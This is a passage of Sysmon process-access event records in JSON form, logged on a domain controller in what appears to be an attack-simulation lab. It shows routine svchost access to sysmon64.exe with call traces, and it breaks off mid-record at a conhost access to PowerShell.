C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:10.218","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2516,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:10.218\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:10.218","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2517,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:10.218\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:10.218","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2518,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:10.218\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:10.218","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2519,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:10.218\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:10.218","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2520,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:10.218\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:10.218","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2521,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:10.218\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:10.218","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2522,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:10.218\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:10.218","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2523,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:10.218\r\nSourceProcessGUID: {A837DB8D-01DE-5F25-0000-0010446C0400}\r\nSourceProcessId: 4344\r\nSourceThreadId: 4364\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-01DE-5F25-0000-0010C47A0400}\r\nTargetProcessId: 4444\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: 